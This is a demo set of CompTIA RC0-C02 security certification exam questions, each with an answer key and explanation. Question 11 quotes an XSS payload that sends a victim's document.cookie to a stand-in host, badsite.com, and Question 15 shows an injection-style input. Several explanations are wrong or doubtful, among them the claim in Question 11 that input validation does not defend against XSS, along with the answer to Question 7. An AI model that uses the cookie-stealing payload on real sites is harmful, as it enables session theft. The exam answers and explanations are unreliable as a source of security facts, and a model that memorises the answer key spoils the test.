CompTIA RC0-C02 Exam: CompTIA Advanced Security Practitioner, Questions & Answers (Demo Version)
Version: 8.0

Question 1
An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this?
A. Access control lists
B. SELinux
C. IPtables firewall
D. HIPS
Answer: B
Explanation:
The most common open source operating system is LINUX. Security-Enhanced Linux (SELinux) was created by the United States National Security Agency (NSA) and is a Linux kernel security module that provides a mechanism for supporting access control security policies, including United States Department of Defense–style mandatory access controls (MAC). NSA Security-enhanced Linux is a set of patches to the Linux kernel and some utilities to incorporate a strong, flexible mandatory access control (MAC) architecture into the major subsystems of the kernel. It provides an enhanced mechanism to enforce the separation of information based on confidentiality and integrity requirements, which allows threats of tampering and bypassing of application security mechanisms to be addressed and enables the confinement of damage that can be caused by malicious or flawed applications.
Incorrect Answers:
A: An access control list (ACL) is a list of permissions attached to an object. An ACL specifies which users or system processes are granted access to objects, as well as what operations are allowed on given objects. ACLs do not enable policy based flexible mandatory access controls to prevent abnormal application modifications or executions.
C: A firewall is used to control data leaving a network or entering a network based on source and destination IP address and port numbers. IPTables is a Linux firewall. However, it does not enable policy based flexible mandatory access controls to prevent abnormal application modifications or executions.
D: Host-based intrusion prevention system (HIPS) is an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host. It does not enable policy based flexible mandatory access controls to prevent abnormal application modifications or executions.
References:
https://en.wikipedia.org/wiki/Security-Enhanced_Linux

Question 2
Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out of disk space. Which of the following is a more cost effective alternative to buying a new SAN?
A. Enable multipath to increase availability
B. Enable deduplication on the storage pools
C. Implement snapshots to reduce virtual disk size
D. Implement replication to offsite datacenter
Answer: B
Explanation:
Storage-based data deduplication reduces the amount of storage needed for a given set of files. It is most effective in applications where many copies of very similar or even identical data are stored on a single disk. It is common for multiple copies of files to exist on a SAN. By eliminating (deduplicating) repeated copies of the files, we can reduce the disk space used on the existing SAN. This solution is a cost effective alternative to buying a new SAN.
Incorrect Answers:
A: Multipathing enables multiple links to transfer the data to and from the SAN. This improves performance and link redundancy. However, it has no effect on the amount of data on the SAN.
C: Snapshots would not reduce the amount of data stored on the SAN.
D: Replicating the data on the SAN to an offsite datacenter will not reduce the amount of data stored on the SAN. It would just create another copy of the data on the SAN in the offsite datacenter.
References:
https://en.wikipedia.org/wiki/Data_deduplication

Question 3
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?
A. Refuse LM and only accept NTLMv2
B. Accept only LM
C. Refuse NTLMv2 and accept LM
D. Accept only NTLM
Answer: A
Explanation:
In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN or LM), an older Microsoft product, and attempts to provide backwards compatibility with LANMAN. NTLM version 2 (NTLMv2), which was introduced in Windows NT 4.0 SP4 (and natively supported in Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks, and adding the ability for a server to authenticate to the client. This question states that the security authentication on the Windows domain is set to the highest level. This will be NTLMv2. Therefore, the answer to the question is to allow NTLMv2 which will enable the Windows users to connect to the UNIX server. To improve security, we should disable the old and insecure LM protocol as it is not used by the Windows computers.
Incorrect Answers:
B: The question states that the security authentication on the Windows domain is set to the highest level. This will be NTLMv2, not LM.
C: The question states that the security authentication on the Windows domain is set to the highest level. This will be NTLMv2, not LM so we need to allow NTLMv2.
D: The question states that the security authentication on the Windows domain is set to the highest level. This will be NTLMv2, not NTLM (version1).
References:
https://en.wikipedia.org/wiki/NT_LAN_Manager

Question 4
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?
A. vTPM
B. HSM
C. TPM
D. INE
Answer: A
Explanation:
A Trusted Platform Module (TPM) is a microchip designed to provide basic security-related functions, primarily involving encryption keys. The TPM is usually installed on the motherboard of a computer, and it communicates with the remainder of the system by using a hardware bus. A vTPM is a virtual Trusted Platform Module. IBM extended the current TPM V1.2 command set with virtual TPM management commands that allow us to create and delete instances of TPMs. Each created instance of a TPM holds an association with a virtual machine (VM) throughout its lifetime on the platform.
Incorrect Answers:
B: A hardware security module (HSM) is a physical computing device that safeguards and manages digital keys for strong authentication and provides cryptoprocessing. These modules traditionally come in the form of a plug-in card or an external device that attaches directly to a computer or network server. This solution would require hardware pass-through.
C: A Trusted Platform Module (TPM) is a microchip designed to provide basic security-related functions, primarily involving encryption keys. The TPM is usually installed on the motherboard of a computer, and it communicates with the remainder of the system by using a hardware bus. Virtual machines cannot access a hardware TPM.
D: INE (intelligent network element) is not used for storing cryptographic keys.
References:
https://en.wikipedia.org/wiki/Hardware_security_module
http://researcher.watson.ibm.com/researcher/view_group.php?id=2280

Question 5
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?
A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk
Answer: A
Explanation:
In this question, we have multiple operating system installations on a single disk. Some operating systems store their boot loader in the MBR of the disk. However, some operating systems install their boot loader outside the MBR especially when multiple operating systems are installed. We need to encrypt as much data as possible but we cannot encrypt the boot loaders. This would prevent the operating systems from loading. Therefore, the solution is to encrypt each individual partition separately.
Incorrect Answers:
B: The question is asking for the BEST way to ensure confidentiality of individual operating system data. Individual file encryption could work but if files are ever added to the operating systems (for updates etc.), you would have to manually encrypt the new files as well. A better solution would be to encrypt the entire partition. That way any new files added to the operating system would be automatically encrypted.
C: You cannot perform full disk encryption on an individual volume. Full disk encryption encrypts the entire disk.
D: FDE of the entire SSD as a single disk would encrypt the boot loaders which would prevent the operating systems from booting.

Question 6
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart.
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-28-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking
Answer: C
Explanation:
In this question, TOCTOU is being exploited to allow the user to modify the temp file that contains the price of the item. In software development, time of check to time of use (TOCTOU) is a class of software bug caused by changes in a system between the checking of a condition (such as a security credential) and the use of the results of that check. This is one example of a race condition. A simple example is as follows: Consider a Web application that allows a user to edit pages, and also allows administrators to lock pages to prevent editing. A user requests to edit a page, getting a form which can be used to alter its content. Before the user submits the form, an administrator locks the page, which should prevent editing. However, since editing has already begun, when the user submits the form, those edits (which have already been made) are accepted. When the user began editing, the appropriate authorization was checked, and the user was indeed allowed to edit. However, the authorization was used later, at a time when edits should no longer have been allowed. TOCTOU race conditions are most common in Unix between operations on the file system, but can occur in other contexts, including local sockets and improper use of database transactions.
Incorrect Answers:
A: Input validation is used to ensure that the correct data is entered into a field. For example, input validation would prevent letters typed into a field that expects a number from being accepted. The exploit in this question is not an example of input validation.
B: SQL injection is a type of security exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data. The exploit in this question is not an example of a SQL injection attack.
D: Session hijacking, also known as TCP session hijacking, is a method of taking over a Web user session by obtaining the session ID and masquerading as the authorized user. The exploit in this question is not an example of session hijacking.
References:
https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use

Question 7
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur?
A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.
Answer: B
Explanation:
Fibre Channel over Ethernet (FCoE) is a computer network technology that encapsulates Fibre Channel frames over Ethernet networks. This allows Fibre Channel to use 10 Gigabit Ethernet networks (or higher speeds) while preserving the Fibre Channel protocol. When moving the disks to another storage array, you need to ensure that the array supports FCoE, not just regular Fiber Channel. Fiber Channel arrays and Fiber Channel over Ethernet arrays use different network connections, hardware and protocols. Fiber Channel arrays use the Fiber Channel protocol over a dedicated Fiber Channel network whereas FCoE arrays use the Fiber Channel protocol over an Ethernet network.
Incorrect Answers:
A: It is unlikely that the data will not be in a usable format. Fiber Channel LUNs appear as local disks on a Windows computer. The computer then creates an NTFS volume on the fiber channel LUN. The storage array does not see the NTFS file system or the data stored on it. FCoE arrays only see the underlying block level storage.
C: The data would not need a file system check. FCoE arrays use block level storage and do not check the file system. Any file system checks would be performed by a Windows computer. Even if this happened, the data would be accessible after the check.
D: The new storage array also having a single controller would not be a problem. Only one controller is required.
References:
https://en.wikipedia.org/wiki/Fibre_Channel_over_Ethernet

Question 8
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation
Answer: E
Explanation:
Use-After-Free vulnerabilities are a type of memory corruption flaw that can be leveraged by hackers to execute arbitrary code. Use After Free specifically refers to the attempt to access memory after it has been freed, which can cause a program to crash or, in the case of a Use-After-Free flaw, can potentially result in the execution of arbitrary code or even enable full remote code execution capabilities. According to the Use After Free definition on the Common Weakness Enumeration (CWE) website, a Use After Free scenario can occur when "the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation. As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process."
Incorrect Answers:
A: Integer overflow is the result of an attempt by a CPU to arithmetically generate a number larger than what can fit in the devoted memory storage space. Arithmetic operations always have the potential of returning unexpected values, which may cause an error that forces the whole program to shut down. This is not what is described in this question.
B: Clickjacking is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. This is not what is described in this question.
C: A race condition is an undesirable situation that occurs when a device or system attempts to perform two or more operations at the same time, but because of the nature of the device or system, the operations must be done in the proper sequence to be done correctly. This is not what is described in this question.
D: SQL injection is a type of security exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data. This is not what is described in this question.
F: Input validation is used to ensure that the correct data is entered into a field. For example, input validation would prevent letters typed into a field that expects a number from being accepted. This is not what is described in this question.
References:
http://www.webopedia.com/TERM/U/use-after-free.html
https://en.wikipedia.org/wiki/Clickjacking
http://searchstorage.techtarget.com/definition/race-condition

Question 9
A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?
A. Client side input validation
B. Stored procedure
C. Encrypting credit card details
D. Regular expression matching
Answer: D
Explanation:
Regular expression matching is a technique for reading and validating input, particularly in web software. This question is asking about securing input fields where customers enter their credit card details. In this case, the expected input into the credit card number field would be a sequence of numbers of a certain length. We can use regular expression matching to verify that the input is indeed a sequence of numbers. Anything that is not a sequence of numbers could be malicious code.
Incorrect Answers:
A: Client side input validation could be used to validate the input into input fields. Client side input validation is where the validation is performed by the web browser. However this question is asking for the BEST answer. A user with malicious intent could bypass the client side input validation whereas it would be much more difficult to bypass regular expression matching implemented in the application code.
B: A stored procedure is SQL code saved as a script. A SQL user can run the stored procedure rather than typing all the SQL code contained in the stored procedure. A stored procedure is not used for validating input.
C: Any stored credit card details should be encrypted for security purposes. Also a secure method of transmission such as SSL or TLS should be used to encrypt the data when transmitting the credit card number over a network such as the Internet. However, encrypting credit card details is not a way of securing the input fields in an application.

Question 10
A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?
A. Investigate the network traffic and block UDP port 3844 at the firewall
B. Remove the system from the network and disable IPv6 at the router
C. Locate and remove the unauthorized 6to4 relay from the network
D. Disable the switch port and block the 2001::/32 traffic at the firewall
Answer: A
Explanation:
The 2001::/32 prefix is used for Teredo tunneling. Teredo is a transition technology that gives full IPv6 connectivity for IPv6-capable hosts that are on the IPv4 Internet but have no native connection to an IPv6 network. Unlike similar protocols, it can perform its function even from behind network address translation (NAT) devices such as home routers. Teredo provides IPv6 (Internet Protocol version 6) connectivity by encapsulating IPv6 datagram packets within IPv4 User Datagram Protocol (UDP) packets. Teredo routes these datagrams on the IPv4 Internet and through NAT devices. Teredo nodes elsewhere on the IPv6 network (called Teredo relays) receive the packets, decapsulate them, and pass them on. The Teredo server listens on UDP port 3844. Teredo clients are assigned an IPv6 address that starts with the Teredo prefix (2001::/32). In this question, the BEST course of action would be to block UDP port 3844 at the firewall. This will block the unauthorized communication. You can then investigate the traffic within the network.
Incorrect Answers:
B: Disabling IPv6 at the router will not help if the IPv6 traffic is encapsulated in IPv4 frames using Teredo. The question also states that there is no IPv6 routing into or out of the network.
C: 6to4 relays work in a similar way to Teredo. However, the addresses used by 6to4 relays start with 2002:: whereas Teredo addresses start with 2001. Therefore, a 6to4 relay is not being used in this question so this answer is incorrect.
D: This question is asking for the BEST solution. Disabling the switch port would take the system connected to it offline and blocking traffic destined for 2001::/32 at the firewall would prevent inbound Teredo communications (if you block the traffic on the inbound interface). However, blocking port UDP 3844 would suffice and investigating the traffic is always a better solution than just disconnecting a system from the network.
References:
https://en.wikipedia.org/wiki/Teredo_tunneling

Question 11
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
Answer: A
Explanation:
The attack in this question is an XSS (Cross Site Scripting) attack. We can prevent this attack by using a Web Application Firewall. A WAF (Web Application Firewall) protects a Web application by controlling its input and output and the access to and from the application. Running as an appliance, server plug-in or cloud-based service, a WAF inspects every HTML, HTTPS, SOAP and XML-RPC data packet. Through customizable inspection, it is able to prevent attacks such as XSS, SQL injection, session hijacking and buffer overflows, which network firewalls and intrusion detection systems are often not capable of doing. A WAF is also able to detect and prevent new unknown attacks by watching for unfamiliar patterns in the traffic data. A WAF can be either network-based or host-based and is typically deployed through a proxy and placed in front of one or more Web applications. In real time or near-real time, it monitors traffic before it reaches the Web application, analyzing all requests using a rule base to filter out potentially harmful traffic or traffic patterns. Web application firewalls are a common security control used by enterprises to protect Web applications against zero-day exploits, impersonation and known vulnerabilities and attackers.
Incorrect Answers:
B: Input validation is used to ensure that the correct data is entered into a field. For example, input validation would prevent letters typed into a field that expects a number from being accepted. Input validation is not an effective defense against an XSS attack.
C: Security information and event management (SIEM) is an approach to security management used to provide a view of an organization’s IT security. It is an information gathering process; it does not in itself provide security.
D: Sandboxing is a process of isolating an application from other applications. It is often used when developing and testing new application. It is not used to defend against an XSS attack.
E: DAM (digital asset management) is a system that creates a centralized repository for digital files that allows the content to be archived, searched and retrieved. It is not used to defend against an XSS attack.
References:
http://searchsecurity.techtarget.com/definition/Web-application-firewall-WAF

Question 12
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
A. Software-based root of trust
B. Continuous chain of trust
C. Chain of trust with a hardware root of trust
D. Software-based trust anchor with no root of trust
Answer: C
Explanation:
A Trusted Platform Module (TPM) is a microchip designed to provide basic security-related functions, primarily involving encryption keys. The TPM is usually installed on the motherboard of a computer, and it communicates with the remainder of the system by using a hardware bus. A vTPM is a virtual Trusted Platform Module; a virtual instance of the TPM. IBM extended the current TPM V1.2 command set with virtual TPM management commands that allow us to create and delete instances of TPMs. Each created instance of a TPM holds an association with a virtual machine (VM) throughout its lifetime on the platform. The TPM is the hardware root of trust. Chain of trust means to extend the trust boundary from the root(s) of trust, in order to extend the collection of trustworthy functions. Implies/entails transitive trust. Therefore a virtual TPM is a chain of trust from the hardware TPM (root of trust).
Incorrect Answers:
A: A vTPM is a virtual instance of the hardware TPM. Therefore, the root of trust is a hardware root of trust, not a software-based root of trust.
B: The chain of trust needs a root. In this case, the TPM is a hardware root of trust. This answer has no root of trust.
D: There needs to be a root of trust. In this case, the TPM is a hardware root of trust. This answer has no root of trust.
References:
https://www.cylab.cmu.edu/tw/slides/martin-tw101.pdf

Question 13
An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure?
A. Replicate NAS changes to the tape backups at the other datacenter.
B. Ensure each server has two HBAs connected through two routes to the NAS.
C. Establish deduplication across diverse storage paths.
D. Establish a SAN that replicates between datacenters.
Answer: D
Explanation:
A SAN is a Storage Area Network. It is an alternative to NAS storage. SAN replication is a technology that replicates the data on one SAN to another SAN; in this case, it would replicate the data to a SAN in the backup datacenter. In the event of a disaster, the SAN in the backup datacenter would contain all the data on the original SAN. Array-based replication is an approach to data backup in which compatible storage arrays use built-in software to automatically copy data from one storage array to another. Array-based replication software runs on one or more storage controllers resident in disk storage systems, synchronously or asynchronously replicating data between similar storage array models at the logical unit number (LUN) or volume block level. The term can refer to the creation of local copies of data within the same array as the source data, as well as the creation of remote copies in an array situated off site.
Incorrect Answers:
A: Replicating NAS changes to the tape backups at the other datacenter would result in a copy of the NAS data in the backup datacenter. However, the data will be stored on tape. In the event of a disaster, you would need another NAS to restore the data to.
B: Ensuring that each server has two routes to the NAS is not a viable solution. The NAS is still a single point of failure. In the event of a disaster, you could lose the NAS and all the data on it.
C: Deduplication is the process of eliminating multiple copies of the same data to save storage space. The NAS is still a single point of failure. In the event of a disaster, you could lose the NAS and all the data on it.
References:
http://searchdisasterrecovery.techtarget.com/definition/Array-based-replication

Question 14
An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?
A. Deploy custom HIPS signatures to detect and block the attacks.
B. Validate and deploy the appropriate patch.
C. Run the application in terminal services to reduce the threat landscape.
D. Deploy custom NIPS signatures to detect and block the attacks.
Answer: B
Explanation:
If an application has a known issue (such as susceptibility to buffer overflow attacks) and a patch is released to resolve the specific issue, then the best solution is always to deploy the patch. A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.
Incorrect Answers:
A: This question is asking for the MOST comprehensive way to resolve the issue. A HIPS (Host Intrusion Prevention System) with custom signatures may offer some protection against an application that is vulnerable to buffer overflow attacks. However, an application that is NOT vulnerable to buffer overflow attacks (a patched application) is a better solution.
C: This question is asking for the MOST comprehensive way to resolve the issue. Running the application in terminal services may reduce the threat landscape. However, it doesn’t resolve the issue. Patching the application to eliminate the threat is a better solution.
D: This question is asking for the MOST comprehensive way to resolve the issue. A NIPS (Network Intrusion Prevention System) with custom signatures may offer some protection against an application that is vulnerable to buffer overflow attacks. However, an application that is NOT vulnerable to buffer overflow attacks (a patched application) is a better solution.
References:
http://searchsecurity.techtarget.com/definition/buffer-overflow

Question 15
select id, firstname, lastname from authors
User input= firstname= Hack;man
lastname=Johnson
Which of the following types of attacks is the user attempting?
A. XML injection
B. Command injection
C. Cross-site scripting
D. SQL injection
Answer: D
Explanation:
The code in the question is SQL code. The attack is a SQL injection attack. SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Incorrect Answers:
A: The code in the question is not XML code. Therefore this is not an XML injection attack so this answer is incorrect.
B: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. The code in the question is not the type of code you would use in a command injection attack.
C: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. The code in the question is not the type of code you would use in an XSS attack.
References:
http://en.wikipedia.org/wiki/SQL_injection